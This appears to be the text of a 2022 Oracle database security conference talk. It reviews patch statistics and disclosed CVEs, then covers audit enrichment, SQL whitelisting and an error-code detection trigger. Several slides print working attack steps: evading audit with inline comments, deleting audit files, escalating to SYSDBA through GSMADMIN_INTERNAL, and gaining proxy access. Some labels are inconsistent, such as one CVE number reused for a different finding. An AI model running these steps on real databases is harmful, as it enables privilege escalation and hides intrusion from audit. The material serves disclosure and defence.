
Best of Oracle Security 2022

What happened in 2022?

Alexander Kornbrust, Red-Database-Security GmbH


Introduction

What will be shown in the next 45 minutes?

- Oracle Security Patches
- Enhance Unified Auditing and Whitelist SQLs
- Outlook 2023

Database Vulnerabilities and CPU

Fewer security bugs than in 2021

(85 in 2021; so far 57 in 2022 (until July 2022))
Looks a little bit better than 2021



Oracle Vulnerabilities 2022

Number of vulnerabilities in Oracle database reduced

- 57* vulnerabilities in 2022 (2021: 85, 2020: 144, 2019: 27, 2018: 12, 2017: 14, 2016: 30, 2015: 29, 2014: 43, 2013: 13, 2012: 17)
- 1 remote exploitable bug
- 1 bug affecting Oracle clients

* until July 2022


Jan 2022 - Sep 2022


January 2022

Oracle CPU January 2022 *
Perform SYS operation without being Audited! **
Oracle database Unified Auditing and SYS Log Limitations ***

* https://www.oracle.com/security-alerts/cpujan2022.html
** https://databasesecurityninja.wordpress.com/tag/oracle-database-cybersecurity-emad-al-mousa/
*** https://databasesecurityninja.wordpress.com/2022/01/14/oracle-database-unified-auditing-and-sys-log-limitations/


January 2022 CPU*

19 security fixes (0 remote exploitable)

- 1 RDBMS (CVSS3 2.7)
- 1 Java VM (CVSS3 4.3)
- 2 APEX (CVSS3 5.4, 3.5)

* https://www.oracle.com/security-alerts/cpujan2022.html

January 2022 - CVE-2021-37695

CKEditor is an open source WYSIWYG HTML editor with rich content support. A potential vulnerability has been discovered in the CKEditor 4 Fake Objects package (https://ckeditor.com/cke4/addon/fakeobjects). The vulnerability allowed injecting malformed Fake Objects HTML, which could result in executing JavaScript code.

- https://github.com/ckeditor/ckeditor4/commit/de3c001540715f9c3801aaa38a1917de46cfcf58

January 2022 - CVE-2021-32723

Prism: some languages before 1.24.0 are vulnerable to Regular Expression Denial of Service (ReDoS).

- https://github.com/PrismJS/prism/security/advisories/GHSA-gj77-59wh-66hg
- https://github.com/PrismJS/prism/pull/2688
- https://github.com/PrismJS/prism/pull/2774

January 2022 - CVE-2022-21247

BYPASS THE REGEXP IN THE VIEW INT$DBA_APP_STATEMENTS USING AN INLINE COMMENT AND/OR HINT

Expression: identified by values('ABC') ==> found

Expression: identified/**/by values('ABC') ==> not found

SQL> alter user sys identified/**/by/**/values 'S:5D0D8D0AC0CAE194BA7AFA95D80CFA6247E34C168B0EE7563CA09EC0EDF8;T:CC3753FA694A0BEFBF45AE8A4887B5D7D50A726DAE15C9F8DBCD0E9AEB8185A8E3D164DFCE01A3A574A7CC7FA1452891401ACCEFE66B7136418B96E3AC5BC028F4BC8CE82A46A0331CF3C6353D3BAA38';

SQL> alter user sys identified/**/by/**/values/**/'S:5D0D8D0AC0CAE194BA7AFA95D80CFA6247E34C168B0EE7563CA09EC0EDF8;T:CC3753FA694A0BEFBF45AE8A4887B5D7D50A726DAE15C9F8DBCD0E9AEB8185A8E3D164DFCE01A3A574A7CC7FA1452891401ACCEFE66B7136418B96E3AC5BC028F4BC8CE82A46A0331CF3C6353D3BAA38';

Perform SYS operation without being Audited!

SQL> startup mount;

SQL> ALTER SYSTEM SET REMOTE_LOGIN_PASSWORDFILE='EXCLUSIVE' SCOPE=SPFILE;

Then exit from the sqlplus session, and then delete all files under $ORACLE_BASE/audit/$ORACLE_SID that have the .BIN extension. These files are called "auditing spillover files".

cd /opt/oracle/audit/ORCLCDB
rm -rf /opt/oracle/audit/ORCLCDB/*

SQL> alter database open;

SQL> exec DBMS_AUDIT_MGMT.LOAD_UNIFIED_AUDIT_FILES;

SQL> select DBUSERNAME, CLIENT_PROGRAM_NAME, EVENT_TIMESTAMP, ACTION_NAME, SQL_TEXT
       from unified_audit_trail
      where SQL_TEXT like '%ALTER SYSTEM SET REMOTE_LOGIN_PASSWORDFILE%'
      order by EVENT_TIMESTAMP desc;

* https://databasesecurityninja.wordpress.com/tag/oracle-database-cybersecurity-emad-al-mousa/

February 2022

CVE-2021-2175 – Database Vault Metadata Exposure Vulnerability *

* https://databasesecurityninja.wordpress.com/2022/02/02/cve-2021-2175-database-vault-metadata-exposure-vulnerability/

March 2022

nothing special happened


April 2022

Oracle CPU April 2022*

* https://www.oracle.com/security-alerts/cpuapr2022.html

April 2022 CPU*

11 security fixes (0 remote exploitable)

- 1 Core RDBMS Sharding (CVSS3 7.2)
- 1 Java VM (CVSS3 6.5)
- 1 Oracle APEX (CVSS3 5.4)
- 1 RDBMS Gateway (CVSS3 5.4)
- 1 Oracle Spatial and Graph (CVSS3 2.8)

* https://www.oracle.com/security-alerts/cpuapr2022.html

April 2022 - CVE-2022-21410

Found by Emad Al-Mousa and Alexander Kornbrust

ESCALATION OF PRIVILEGE FROM GSMADMIN_INTERNAL TO SYSDBA

Instead of using sys.dbms_sys_sql (via a direct execute privilege), I am using the new procedure SYS.execAsUser, which calls dbms_sys_sql internally, so no direct privilege on dbms_sys_sql is needed.

This mighty procedure execasuser is explicitly restricted with an ACCESSIBLE BY clause to the following callers:

ACCESSIBLE BY (PACKAGE GSMADMIN_INTERNAL.DBMS_GSM_DBADMIN,
               PACKAGE GSMADMIN_INTERNAL.DBMS_GSM_POOLADMIN,
               PACKAGE GSMADMIN_INTERNAL.DBMS_GSM_COMMON,
               PACKAGE GSMADMIN_INTERNAL.DBMS_GSM_CLOUDADMIN,
               PACKAGE GSMADMIN_INTERNAL.DBMS_GSM_UTILITY,
               PACKAGE GGSYS.GGSHARDING,
               PROCEDURE GSMADMIN_INTERNAL.EXECUTEDDL)

April 2022 - CVE-2022-21410

Run as a DBA user (or any other user with CREATE ANY PROCEDURE / EXECUTE ANY PROCEDURE):

SQL> create or replace PROCEDURE gsmadmin_internal.executeDDL
       (DDLID          IN OUT NUMBER,
        SCHEMA_NAME    IN VARCHAR2,
        DDL_TEXT       IN CLOB DEFAULT NULL,
        OPERATION_TYPE IN CHAR,
        PARAMS         IN VARCHAR2 DEFAULT NULL,
        DDLACTION      IN NUMBER DEFAULT DBMS_GSM_COMMON.EXECDDL_DEFAULT)
     AS
       RUNDDL       BOOLEAN;
       REP_TYPE     BINARY_INTEGER;
       EXEC_STR     VARCHAR2(256);
       TRACE_PHRASE CLOB;
       CHECK_DDLID  NUMBER;
     BEGIN
       -- the replaced body: EXECUTEDDL is an allowed caller of execasuser,
       -- so whatever is passed here ('ABC' is only a placeholder) runs as SYS
       SYS.EXECASUSER('SYS', 'ABC');
     END EXECUTEDDL;
     /
May 2022

DBA - Rodrigo Jorge - Oracle Database Dictionary changelog 19c/21c*

* https://www.dbarj.com.br/en/2022/05/oracle-database-dictionary-changelog/

June 2022 - CVE-2021-35576 – Bypassing Unified Audit Policy*

* https://databasesecurityninja.wordpress.com/2022/06/11/cve-2021-35576-bypassing-unified-audit-policy/

June 2022 - CVE-2021-35576

SQL> CREATE AUDIT POLICY SELECT_P1 actions select on HR.EMPLOYEE;

SQL> audit policy SELECT_P1;

sqlplus / as sysdba

SQL> alter session set container=PDB1;

SQL> shutdown immediate;

SQL> startup upgrade;

SQL> select * from HR.EMPLOYEE;

SQL> startup force;

SQL> exec SYS.DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL;

July 2022

Oracle CPU July 2022 *
Privilege Elevation in Oracle CDB Architecture – Unauthorized Proxy Access **

* https://www.oracle.com/security-alerts/cpujul2022.html
** https://databasesecurityninja.wordpress.com/2022/07/16/privilege-elevation-in-oracle-cdb-architecture-unauthorized-proxy-access%EF%BF%BC/

July 2022 CPU*

27 security fixes (1 remote exploitable)

- 1 Core RDBMS (CVSS3 9.1)
- 1 Oracle Sharding (CVSS3 8.8)
- 1 Oracle Recovery (CVSS3 7.2)
- 1 Java VM (CVSS3 6.5)
- 2 Oracle APEX (CVSS3 5.7, 5.4)
- 1 Liquibase (CVSS3 5.0)
- 1 Oracle Spatial and Graph (CVSS3 4.3)
- 1 Oracle Security (CVSS3 2.7)

* https://www.oracle.com/security-alerts/cpujul2022.html

July 2022 - CVE-2022-21410

Found by Alexander Kornbrust


DIFFERENT CLEARTEXT PASSWORDS WRITTEN INTO A FILE AT OS LEVEL BY DBMS_GSM_POOLADMIN

Privilege Elevation in Oracle CDB Architecture – Unauthorized Proxy Access

sqlplus / as sysdba

SQL> alter session set container=ORCLPDB1;

Session altered.

SQL> create user faris identified by faris_123;

User created.

SQL> grant create session, create any procedure, execute any procedure to faris;

Grant succeeded.

SQL> exit;

Now, connect to pluggable database ORCLPDB1 as account "faris":

sqlplus "faris/faris_123"@ORCLPDB1

SQL> CREATE OR REPLACE procedure wmsys.dummy
     IS
     BEGIN
       execute immediate 'alter user system grant connect through faris';
     END;
     /

SQL> exec wmsys.dummy;

https://databasesecurityninja.wordpress.com/2022/07/16/privilege-elevation-in-oracle-cdb-architecture-unauthorized-proxy-access%EF%BF%BC/


August 2022
September 2022

DOAG 2022*
AttachMe Vulnerability in OCI**

* https://anwenderkonferenz.doag.org/de/home/
** https://www.wiz.io/blog/attachme-oracle-cloud-vulnerability-allows-unauthorized-cross-tenant-volume-access


Other interesting Oracle Security stuff - Good to know

Enhancing Oracle Unified Auditing / Whitelisting SQL Statements

Enhancing Oracle Auditing

Anyone who evaluates audit logs often finds that the recorded information is not very helpful in some cases.

For example, in 3-tier architectures only the application user (e.g. WEBUSER) appears in the audit trail, not the end user.

However, this can be adjusted with some minor changes. As a result, one gets much more useful data for evaluation.


Enhancing Oracle Auditing

The following fields in the Oracle Unified Auditing trail can be enhanced:

- CLIENT_IDENTIFIER - VARCHAR2(64) - Client identifier in each Oracle session (via DBMS_SESSION.SET_IDENTIFIER; DBMS_APPLICATION_INFO.SET_CLIENT_INFO sets the separate CLIENT_INFO field)

- CLIENT_PROGRAM_NAME - VARCHAR2(48) - Client program name which issued the commands in the user session (via DBMS_APPLICATION_INFO.SET_MODULE)

- ACTION_NAME - VARCHAR2(64) - Name of the action executed by the user (via DBMS_APPLICATION_INFO.SET_ACTION)

- APPLICATION_CONTEXTS - VARCHAR2(4000) - Semicolon-separated list of application context namespace, attribute and value information in (APPCTX_NSPACE,APPCTX_ATTRIBUTE=<value>) format (via DBMS_SESSION.SET_CONTEXT)

Enhancing Oracle Auditing - client identifier

See Best of Oracle Security 2018
Insert custom values via Oracle Client Identifier (DBMS_SESSION)

------- glogin.sql -------

set term off
-- write the OS login name (the account used before "su - oracle") into a DEFINE variable
host echo "define login_user=$(who am i | cut -d' ' -f1)" > loguser.sql
@loguser.sql
exec dbms_session.set_identifier('&login_user');
set term on

------- glogin.sql -------


Enhancing Oracle Auditing - client identifier

See Best of Oracle Security 2018

Session 1 (as schmidt):
ssh dbserver1 (as schmidt)
su - oracle
sqlplus / as sysdba
SQL> create user cracker identified by cracker;

Session 2 (as weber):
ssh dbserver1 (as weber)
su - oracle
sqlplus / as sysdba
SQL> create user hacker identified by hacker;

SQL> select sessionid, client_identifier, os_username, dbusername, sql_text, UNIFIED_AUDIT_POLICIES
       from unified_audit_trail;

2056298984 oracle schmidt SYS create user cracker identified by * ORA_ACCOUNT_MGMT, ORA_CIS_RECOMMENDATIONS
2602877895 oracle weber SYS create user hacker identified by * ORA_ACCOUNT_MGMT, ORA_CIS_RECOMMENDATIONS

Enhancing Oracle Auditing - Module/Program Name

Insert custom values via Oracle Context. This functionality is commonly known and often used by 3rd-party applications.

DBMS_APPLICATION_INFO.SET_MODULE
DBMS_APPLICATION_INFO.SET_ACTION

Usage:
exec dbms_application_info.set_module(module_name=>'MYMOD1', action_name=>'MYACTION1');

Enhancing Oracle Auditing - context

Insert custom values via Oracle Context

Scenario: pass values from a web session

SQL> AUDIT CONTEXT NAMESPACE CLIENTCONTEXT ATTRIBUTES PMNAME,FMNAME,USERID,AFTRGKEY,VSNR;

Enhancing Oracle Auditing - context 1

Oracle has a default context called CLIENTCONTEXT. This is useful if you do not want to create a custom context object.

1. Create Unified Audit Policy

CREATE AUDIT POLICY test_audit_policy
  ACTIONS ALL ON test.tab1
  EVALUATE PER SESSION
  CONTAINER = CURRENT;
-- the policy only records anything once it is enabled
AUDIT POLICY test_audit_policy;

2. Add Context Values to Unified Auditing

AUDIT CONTEXT NAMESPACE CLIENTCONTEXT ATTRIBUTES MYURL, WEBUSER;

3. Set the context values in your DB session (e.g. from Java, …)

-- Client URL
EXEC DBMS_SESSION.set_context('CLIENTCONTEXT','MYURL','order.jsp');
-- Client User-ID
EXEC DBMS_SESSION.set_context('CLIENTCONTEXT','WEBUSER','frweber1966');

4. The Unified Audit entry contains your context values frweber1966/order.jsp

SELECT application_contexts, ua.* FROM unified_audit_trail ua;




Enhancing Oracle Auditing - context 2

Enhancing Oracle Auditing - context 3

Important:
Do not forget to reset the session (e.g. with connection pooling), using

DBMS_SESSION.RESET_PACKAGE
or

sys.DBMS_SESSION.clear_all_context('parameter_ctx');

Links:
https://docs.oracle.com/database/121/DBSEG/app_context.htm#DBSEG011
https://docs.oracle.com/en/database/oracle/oracle-database/19/dbseg/
managing-security-for-application-developers.html
https://riptutorial.com/oracle/example/6852/create-a-context
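Putting the client identifier, module/action and CLIENTCONTEXT slides together with the reset warning above, this added example (not from the deck) tags a pooled session per request and clears it again; the package name APP_AUDIT_TAG and the attribute names WEBUSER/MYURL are assumptions.

```sql
-- Added example (not from the deck): one package that tags a pooled session
-- with the end-user information from the slides above (client identifier,
-- module/action, CLIENTCONTEXT attributes) and clears it again before the
-- connection goes back to the pool. Package name APP_AUDIT_TAG is assumed.
CREATE OR REPLACE PACKAGE app_audit_tag AS
  PROCEDURE begin_request(p_webuser IN VARCHAR2, p_url IN VARCHAR2,
                          p_module  IN VARCHAR2 DEFAULT 'WEBAPP');
  PROCEDURE end_request;
END app_audit_tag;
/
CREATE OR REPLACE PACKAGE BODY app_audit_tag AS
  PROCEDURE begin_request(p_webuser IN VARCHAR2, p_url IN VARCHAR2,
                          p_module  IN VARCHAR2 DEFAULT 'WEBAPP') IS
  BEGIN
    -- CLIENT_IDENTIFIER is VARCHAR2(64) in the audit trail: truncate, never fail
    DBMS_SESSION.SET_IDENTIFIER(SUBSTR(p_webuser, 1, 64));
    -- module/action as on the "Module/Program Name" slide (action max 32 bytes)
    DBMS_APPLICATION_INFO.SET_MODULE(module_name => p_module,
                                     action_name => SUBSTR(p_url, 1, 32));
    -- CLIENTCONTEXT attributes; they reach the audit trail only while
    -- AUDIT CONTEXT NAMESPACE CLIENTCONTEXT ATTRIBUTES MYURL, WEBUSER; is active
    DBMS_SESSION.SET_CONTEXT('CLIENTCONTEXT', 'WEBUSER', p_webuser);
    DBMS_SESSION.SET_CONTEXT('CLIENTCONTEXT', 'MYURL',   p_url);
  END begin_request;

  PROCEDURE end_request IS
  BEGIN
    -- Reset everything, otherwise the next borrower of this pooled connection
    -- is audited under the previous end user's name (the "context 3" warning)
    DBMS_SESSION.CLEAR_IDENTIFIER;
    DBMS_APPLICATION_INFO.SET_MODULE(module_name => NULL, action_name => NULL);
    DBMS_SESSION.CLEAR_ALL_CONTEXT('CLIENTCONTEXT');
  END end_request;
END app_audit_tag;
/
-- Per request: app_audit_tag.begin_request('frweber1966', 'order.jsp');
--              ... application SQL ...  app_audit_tag.end_request;

-- Audit review: which end user issued which statement from which page?
SELECT event_timestamp, dbusername, client_identifier, client_program_name,
       application_contexts, sql_text
  FROM unified_audit_trail
 WHERE application_contexts LIKE '%WEBUSER=%'
 ORDER BY event_timestamp DESC;
```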



Whitelisting SQL

How to whitelist SQL statements

- Auditing (too slow, not blocking attacks)
- Oracle DB Firewall ($$$)
- 3rd-party Database Activity Monitoring (e.g. Trellix / McAfee DAM) ($$$)
- SQL Translation Framework (no additional license required)

Whitelisting SQL

SQL Translation Framework

The SQL Translation Framework is usually used to rewrite other SQL dialects such as DB2 or MSSQL on-the-fly, or to rewrite poor/slow SQL commands.

In our example we use the functionality to execute only predefined SQL commands (whitelist).

SQL commands that are not in the whitelist are blocked and (can) trigger an error that can be caught (via error trigger ==> SIEM).

Whitelisting SQL

1. Create an SQL Translation Profile
2. Register SQL Translation
3. Test

https://www.robotron.de/unternehmen/aktuelles/blog/sql-translation-framework

Whitelisting SQL
-- 1. Create Profile STF_SECURITY
exec dbms_sql_translator.create_profile(profile_name => 'STF_SECURITY');

-- 2. Register whitelisted SQL - 1st SQL
begin
  dbms_sql_translator.set_attribute(
    profile_name    => 'STF_SECURITY',
    attribute_name  => dbms_sql_translator.ATTR_FOREIGN_SQL_SYNTAX,
    attribute_value => dbms_sql_translator.ATTR_VALUE_FALSE);

  dbms_sql_translator.register_sql_translation(
    profile_name    => 'STF_SECURITY',
    sql_text        => 'select * from tab1 where id=1',
    translated_text => 'select * from sectest1.tab1 where id=1');
end;
/





Whitelisting SQL

-- 2. Register whitelisted SQL - 2nd SQL
begin
  dbms_sql_translator.set_attribute(
    profile_name    => 'STF_SECURITY',
    attribute_name  => dbms_sql_translator.ATTR_FOREIGN_SQL_SYNTAX,
    attribute_value => dbms_sql_translator.ATTR_VALUE_FALSE);

  dbms_sql_translator.register_sql_translation(
    profile_name    => 'STF_SECURITY',
    sql_text        => 'select * from tab1 where id=3',
    translated_text => 'select * from sectest1.tab1 where id=3');
end;
/
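The two registration blocks above repeat the same calls per statement; this added example (not from the deck) registers a whole whitelist in one re-runnable block, keeping the deck's profile STF_SECURITY and schema SECTEST1 while the statement pairs themselves are constructed.

```sql
-- Added example (not from the deck): register the whole whitelist in one
-- block instead of one block per statement. Profile STF_SECURITY and schema
-- SECTEST1 are the deck's; the statement pairs below are constructed.
DECLARE
  -- application statement => statement that is really executed
  TYPE t_whitelist IS TABLE OF VARCHAR2(4000) INDEX BY VARCHAR2(4000);
  l_wl   t_whitelist;
  l_app  VARCHAR2(4000);
  l_cnt  PLS_INTEGER;
BEGIN
  l_wl('select * from tab1 where id=1') := 'select * from sectest1.tab1 where id=1';
  l_wl('select * from tab1 where id=3') := 'select * from sectest1.tab1 where id=3';
  l_wl('select count(*) from tab1')     := 'select count(*) from sectest1.tab1';

  -- 1. create the profile only if it does not exist yet (re-runnable)
  SELECT COUNT(*) INTO l_cnt
    FROM user_sql_translation_profiles
   WHERE profile_name = 'STF_SECURITY';
  IF l_cnt = 0 THEN
    dbms_sql_translator.create_profile(profile_name => 'STF_SECURITY');
  END IF;

  -- the application sends plain Oracle SQL, not a foreign dialect
  dbms_sql_translator.set_attribute(
    profile_name    => 'STF_SECURITY',
    attribute_name  => dbms_sql_translator.ATTR_FOREIGN_SQL_SYNTAX,
    attribute_value => dbms_sql_translator.ATTR_VALUE_FALSE);

  -- 2. register every whitelisted statement
  l_app := l_wl.FIRST;
  WHILE l_app IS NOT NULL LOOP
    dbms_sql_translator.register_sql_translation(
      profile_name    => 'STF_SECURITY',
      sql_text        => l_app,
      translated_text => l_wl(l_app));
    l_app := l_wl.NEXT(l_app);
  END LOOP;
END;
/
-- review the registered whitelist
SELECT sql_text, translated_text
  FROM user_sql_translations
 WHERE profile_name = 'STF_SECURITY';
```

A statement that is not registered is passed through untranslated, so the ORA-00942 in the test slides depends on the application user owning no TAB1 and holding no privileges on SECTEST1.TAB1; an application user with direct object privileges would not be stopped by the whitelist.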

Whitelisting SQL
3. Test

SQL> alter session set sql_translation_profile=schema_owner.MMI_SQLTRANS_TEST;

-- … id=1 is in the whitelist
SQL> select * from tab1 where id=1;
ID NAME PASSWORD
---------- ---------- --------------------------------
1 alex secret1

-- … id=3 is in the whitelist
SQL> select * from tab1 where id=3;
ID NAME PASSWORD
---------- ---------- --------------------------------
3 jay bik3

-- … id=2 is not whitelisted and throws an error
SQL> select * from tab1 where id=2;
*
FEHLER in Zeile 1:
ORA-00942: Tabelle oder View nicht vorhanden

-- SQL injection attempts throw an error
SQL> select * from tab1 where id=1 or 1=1--;
*
FEHLER in Zeile 1:
ORA-00942: Tabelle oder View nicht vorhanden


Summary

Are you prepared?

- Use Auditing (Unified Auditing or 3rd-party)
- Use Oracle Error Trigger
- Collect all audit logs in a central repository (log collection, SIEM)
- Analyze the audit log via dashboards:
  - Invalid Login Attempts
  - Insufficient Privileges
  - Unusual Activity
  - Interactive logins outside the business hours
  - TDE activities (ALTER SYSTEM SET…)
  - Usage of ANY commands (e.g. CREATE ANY …)
  - Potential SQL Injection Attempts from applications (ORA error codes '900','906','907','911','917','920','923','933','970','1031','1476','1719','1722','1742','1756','1789','1790','13605','13797','19202','20000','24247','29257','29532','29540','31011','31600')
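As an added example (not from the deck) of the "Oracle Error Trigger" item and the error-code list above, this AFTER SERVERERROR trigger logs the listed codes, plus ORA-00942 from a non-whitelisted statement in the SQL Translation Framework setup, into a table a SIEM or dashboard can read; the table SEC_ERROR_LOG and trigger SEC_ERROR_TRG are assumed names.

```sql
-- Added example (not from the deck): an AFTER SERVERERROR trigger that records
-- the error codes listed above as SQL injection symptoms (plus ORA-00942, which
-- a non-whitelisted statement raises in the SQL Translation Framework setup).
-- Table SEC_ERROR_LOG and trigger SEC_ERROR_TRG are assumed names.
CREATE TABLE sec_error_log (
  ts        TIMESTAMP DEFAULT SYSTIMESTAMP,
  err_code  NUMBER,
  db_user   VARCHAR2(128),
  os_user   VARCHAR2(128),
  client_ip VARCHAR2(64),
  module    VARCHAR2(64),
  sql_text  CLOB);

CREATE OR REPLACE TRIGGER sec_error_trg
AFTER SERVERERROR ON DATABASE
DECLARE
  PRAGMA AUTONOMOUS_TRANSACTION;   -- keep the log row even if the session rolls back
  TYPE t_codes IS TABLE OF PLS_INTEGER;
  l_watch  t_codes := t_codes(900,906,907,911,917,920,923,933,942,970,1031,1476,
                              1719,1722,1742,1756,1789,1790,13605,13797,19202,20000,
                              24247,29257,29532,29540,31011,31600);
  l_pieces ora_name_list_t;
  l_n      PLS_INTEGER;
  l_txt    CLOB;
BEGIN
  IF ora_server_error(1) MEMBER OF l_watch THEN
    -- the failing statement comes back in pieces; reassemble it
    l_n := ora_sql_txt(l_pieces);
    FOR i IN 1 .. NVL(l_n, 0) LOOP
      l_txt := l_txt || l_pieces(i);
    END LOOP;
    INSERT INTO sec_error_log (err_code, db_user, os_user, client_ip, module, sql_text)
    VALUES (ora_server_error(1), ora_login_user,
            SYS_CONTEXT('USERENV', 'OS_USER'), SYS_CONTEXT('USERENV', 'IP_ADDRESS'),
            SYS_CONTEXT('USERENV', 'MODULE'), l_txt);
    COMMIT;
  END IF;
END;
/
-- dashboard / SIEM query: bursts of injection-type errors per user and module
SELECT db_user, module, err_code, COUNT(*) AS hits,
       MIN(ts) AS first_seen, MAX(ts) AS last_seen
  FROM sec_error_log
 WHERE ts > SYSTIMESTAMP - INTERVAL '1' HOUR
 GROUP BY db_user, module, err_code
HAVING COUNT(*) >= 5
 ORDER BY hits DESC;
```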

Outlook 2023

- More Auditing (Audit Analysis, …)
- (Audit) log collection (SIEM)

Q&A
Thank you
Contact:
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
